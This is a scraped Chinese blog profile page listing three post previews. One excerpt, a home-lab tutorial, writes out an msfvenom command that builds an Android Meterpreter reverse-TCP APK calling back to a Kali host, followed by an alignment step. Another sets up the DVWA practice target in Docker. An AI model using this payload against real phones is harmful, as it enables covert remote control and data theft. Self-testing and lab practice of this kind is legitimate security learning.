自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 Kali 2020:用Metasploit实验入侵自己的安卓手机

目标:使用Kali里的Metasploit远程控制自己的安卓手机(先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为)一:生产apk安卓应用1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk2,使用zipzlign对apk进行对齐zipalign -v 4 t.apk tz

2020-11-01 22:10:52 15985 15

原创 Kali 2020 docker容器里的DVWA靶场

目标很明确,就是要弄一个DVWA的靶场做文件上传漏洞和SQL注入的联系。只求达到目的。Kali安装docker很简单,软件源里就有。请勿重复造轮子。sudo apt updatesudo apt install -y docker.io拉取DVWA靶场并启动sudo docker search dvwasudo docker pull citizenstig/dvwasudo docker run --rm -p 80:80 citizenstig/dvwa找到容器里DVWA靶场的IP

2020-11-01 14:55:24 1540

原创 写写画画,请勿重复造轮子

请勿重复找资料,重复造轮子

2020-11-01 14:07:53 192

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除